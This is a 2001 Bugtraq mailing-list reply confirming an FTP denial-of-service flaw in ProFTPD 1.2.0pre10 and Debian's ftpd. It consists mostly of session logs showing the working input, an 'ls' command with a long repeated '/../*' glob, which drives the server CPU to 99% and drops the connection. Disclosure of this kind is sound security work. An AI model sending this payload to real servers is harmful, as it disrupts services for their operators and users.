Bugtraq mailing list archives
RE: Multiple-Vendor-FTP-Vuln. (old?)
From: "E. van Elk" <evelk () dsv nl>
Date: Tue, 21 Aug 2001 01:41:14 +0200
At 00:43 21-8-2001, you wrote:
>Couldn't reproduce on Debian 2.2....
>
>isp-server-03:/# proftpd -v
> - ProFTPD Version 1.2.0pre10

I tested it on my Debian 2.2 machine and:

:/# proftpd -v
 - ProFTPD Version 1.2.0pre10

Verbonden met .
220 ProFTPD 1.2.0pre10 Server (Debian) []
Gebruiker ( :(none)):
331 Password required for .
Wachtwoord:
230 User logged in.
ftp> ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
200 PORT command successful.
550 No files found.
ftp> ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
200 PORT command successful.
Verbinding verbroken door externe host.
ftp>

CPU goes to 99.1% and after the second attempt the connection to the server is broken.

Debian 2.2 ftpd 0.11-8potato.1 is vulnerable too:

Verbonden met .
220 FTP server (Version 6.2/OpenBSD/Linux-0.10) ready.
Gebruiker ( :(none)):
331 Password required for .
Wachtwoord:
230- Linux 2.2.19pre17 #1 Tue Mar 13 22:37:59 EST 2001 i686 unknown
230-
230 User logged in.
ftp> ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
200 PORT command successful.
550 not found
ftp> ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
200 PORT command successful.
Verbinding verbroken door externe host.
ftp>

CPU goes to 99.1% and after the second attempt the connection to the server is broken.